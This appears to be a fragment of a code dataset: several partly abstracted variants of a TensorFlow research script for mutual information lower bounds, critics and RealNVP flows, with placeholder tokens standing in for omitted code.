{:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\ndef get_classification_accuracy(session, codes, data_ph, dims):\n x_train_mapped = map_data(x_train, session, codes, data_ph, dims)\n x_test_mapped = map_data(x_test, session, codes, data_ph, dims)\n accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)\n return accuracy\n\n\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, shape=[None,\n data_dimensions])\n data_ph_noisy = data_ph + noise_std * tf.random.normal(tf.shape(\n input=data_ph))\n codes = g1(data_ph_noisy)\n (training_losses, testing_losses, classification_accuracies, iters,\n sigmas) = [], [], [], [], []\n for iter_n in range(n_iters):\n if iter_n % (n_iters // n_evals) == 0:\n iters.append(iter_n)\n accuracy = get_classification_accuracy(session, codes,\n data_ph, data_dimensions)\n classification_accuracies.append(accuracy)\n testing_losses.append(get_testing_loss(x_test, session,\n loss, data_ph, data_dimensions))\n if compute_jacobian:\n sigmas.append(session.run(singular_values))\n print(\n '{:d}th iter Loss_name {} Step {:>10d} fit {:>.5f} DS {} B {:d} lr {:f}'\n .format(n_iter, loss_name, iter_n, accuracy, args.\n dataset, args.batch_size, args.lr))\n loss_np, _ = session.run([loss, optimizer_op])\n training_losses.append(loss_np)\n return Results(iterations=iters, training_losses=training_losses,\n testing_losses=testing_losses, classification_accuracies=\n classification_accuracies, singular_values=sigmas)\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\ndef apply_default_style(ax):\n ax.set_xlim([0, 20001])\n ax.get_xaxis().set_major_formatter(FuncFormatter(lambda x, p: format(\n int(x / 1000), ',')))\n ax.set_xlabel('Training steps (in thousands)')\n plt.tick_params(top=False, right=False, bottom=False, left=False)\n handles, labels = ax.get_legend_handles_labels()\n plt.legend(loc='lower right', handles=handles[1:], labels=labels[1:])\n\n\ndef get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):\n total_loss = 0\n for i in range(0, x_array.shape[0], batch_size):\n x_slice = x_array[i:i + batch_size, :dims]\n total_loss += x_slice.shape[0] * session.run(loss, feed_dict={\n data_ph: x_slice})\n return total_loss / x_array.shape[0]\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef tuba_lower_bound(scores, log_baseline=None):\n if log_baseline is not None:\n scores -= log_baseline[:, None]\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))\n return 1.0 + joint_term - marg_term\n\n\n<function token>\n\n\[email protected]\ndef js_fgan_lower_bound(f):\n \"\"\"Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016).\"\"\"\n f_diag = tf.linalg.tensor_diag_part(f)\n first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))\n n = tf.cast(f.shape[0], tf.float32)\n second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.\n softplus(f_diag))) / (n * (n - 1.0))\n return first_term - second_term\n\n\n<function token>\n\n\[email protected]\ndef our_lower_bound(scores):\n \"\"\"Our lower bound\"\"\"\n batch_size = tf.cast(scores.shape[0], tf.float32)\n joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))\n scores_sq = scores ** 2\n marg_num = batch_size * (batch_size - 1.0)\n marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(\n input_tensor=tf.linalg.diag_part(scores_sq))\n marg_term = marg_term / marg_num\n return joint_term - 0.5 * marg_term\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\ndef train(g1, g2, critic, loss_fn, learning_rate, batch_size=\n TRAIN_BATCH_SIZE, n_iters=15000, n_evals=15, compute_jacobian=False,\n noise_std=0.0, data_dimensions=DIMS // 2, n_iter=1, loss_name='InfoNCE'):\n \"\"\"Runs the training loop for a fixed model.\n\n Args:\n g1: Function, maps input1 to representation.\n g2: Function, maps input2 to representation.\n critic: Function, maps two representations to scalar.\n loss_fn: Function, mutual information estimator.\n learning_rate: Learning rate.\n batch_size: Training batch size.\n n_iters: Number of optimization iterations.\n n_evals: Number of model evaluations.\n compute_jacobian: Whether to estimate the singular values of the Jacobian.\n noise_std: Standard deviation for the Gaussian noise. Default is 0.0.\n data_dimensions: The dimension of the data. By default it's half of the\n original data dimension.\n Returns:\n Returns and instance of `Results` tuple.\n \"\"\"\n x_1, x_2, _ = processed_train_data(data_dimensions, batch_size)\n if noise_std > 0.0:\n assert x_1.shape == x_2.shape, 'X1 and X2 shapes must agree to add noise!'\n noise = noise_std * tf.random.normal(x_1.shape)\n x_1 += noise\n x_2 += noise\n code_1, code_2 = g1(x_1), g2(x_2)\n critic_matrix = critic(code_1, code_2)\n if compute_jacobian:\n jacobian = gradients.batch_jacobian(code_1, x_1, use_pfor=False)\n singular_values = tf.linalg.svd(jacobian, compute_uv=False)\n loss = loss_fn(critic_matrix)\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate=learning_rate)\n if not loss_name == 'wpc':\n optimizer_op = optimizer.minimize(loss)\n else:\n gvs = optimizer.compute_gradients(loss)\n capped_gvs = [(tf.clip_by_value(grad, -1.0, 1.0), var) for grad,\n var in gvs]\n optimizer_op = optimizer.apply_gradients(capped_gvs)\n with tf.compat.v1.Session() as session:\n session.run(tf.compat.v1.global_variables_initializer())\n data_ph = tf.compat.v1.placeholder(tf.float32, 